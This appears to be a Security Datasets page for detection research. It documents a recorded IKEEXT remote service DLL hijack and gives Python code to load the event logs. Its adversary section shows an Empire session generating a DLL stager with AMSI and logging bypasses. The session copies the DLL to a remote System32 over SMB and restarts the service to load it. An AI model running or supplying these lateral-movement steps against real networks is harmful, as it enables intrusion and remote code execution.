IKEEXT Remote Service DLL Hijack
Contents
IKEEXT Remote Service DLL Hijack#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/04/03 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
Remote Service DLL Hijacking,RPC over SMB Svcctl |
Dataset Description#
This dataset represents adversaries copying a file remotely to replace a file which is executed by a service that is vulnerable to DLL hijack. This dataset includes
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Adversary View#
(Empire: agents) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher
Description:
Generate a PowerPick Reflective DLL to inject with
stager code.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True http Listener to use.
Language True powershell Language of the stager to generate.
Arch True x64 Architecture of the .dll to generate
(x64 or x86).
StagerRetries False 0 Times for the stager to retry
connecting.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
OutFile True /tmp/wlbsctrl.dll File to output dll to.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
ScriptLogBypass False True Include cobbr's Script Block Log Bypass
in the stager code.
ETWBypass False False Include tandasat's ETW bypass in the
stager code.
(Empire: stager/windows/dll) > back
(Empire: agents) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
GCSKD17Z ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 1112 5/0.0 2020-09-22 03:51:02 http
(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) >
(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll
[*] Tasked agent to upload wlbsctrl.dll, 124 KB
(Empire: GCSKD17Z) > shell COPY .\wlbsctrl.dll \\WORKSTATION6\C$\Windows\System32\wlbsctrl.dll
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 3
(Empire: GCSKD17Z) >
..Command execution completed.
(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 stop IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 4
(Empire: GCSKD17Z) >
SERVICE_NAME: IKEEXT
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x1388
..Command execution completed.
(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 query IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 5
(Empire: GCSKD17Z) >
SERVICE_NAME: IKEEXT
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
..Command execution completed.
(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 start IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 6
(Empire: GCSKD17Z) >
SERVICE_NAME: IKEEXT
TYPE : 30 WIN32
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 6172
FLAGS :
..Command execution completed.
(Empire: GCSKD17Z) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)